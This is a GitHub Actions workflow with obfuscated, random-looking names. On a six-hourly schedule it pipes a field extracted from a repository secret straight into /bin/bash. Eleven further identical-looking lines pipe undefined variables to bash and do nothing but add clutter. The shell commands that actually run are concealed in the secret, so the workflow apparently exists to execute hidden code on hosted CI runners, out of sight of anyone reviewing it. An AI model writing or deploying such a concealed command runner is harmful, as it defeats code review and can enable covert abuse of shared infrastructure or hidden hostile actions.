name: xiezijian7654
on:
  workflow_dispatch:
  schedule:
    - cron: '23 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiezijian7654
        env:
          s2477: ${{ secrets.s2477 }}
        run: |
          echo $s2477 | jq -r .o112 | /bin/bash
          echo $gjm4262 | jq -r .kbenf5272 | /bin/bash
          echo $nvgvo9576 | jq -r .xqjqo40544 | /bin/bash
          echo $sqld3 | jq -r .qk5641 | /bin/bash
          echo $bu318 | jq -r .ti76284 | /bin/bash
          echo $tctk3 | jq -r .etem495 | /bin/bash
          echo $tz53 | jq -r .xwz018 | /bin/bash
          echo $ebesi9526 | jq -r .ud501 | /bin/bash
          echo $i68247 | jq -r .cuupb78 | /bin/bash
          echo $rxihn21840 | jq -r .sy04076 | /bin/bash
          echo $sbu9968 | jq -r .zoq9902 | /bin/bash
          echo $oco27 | jq -r .kon5 | /bin/bash

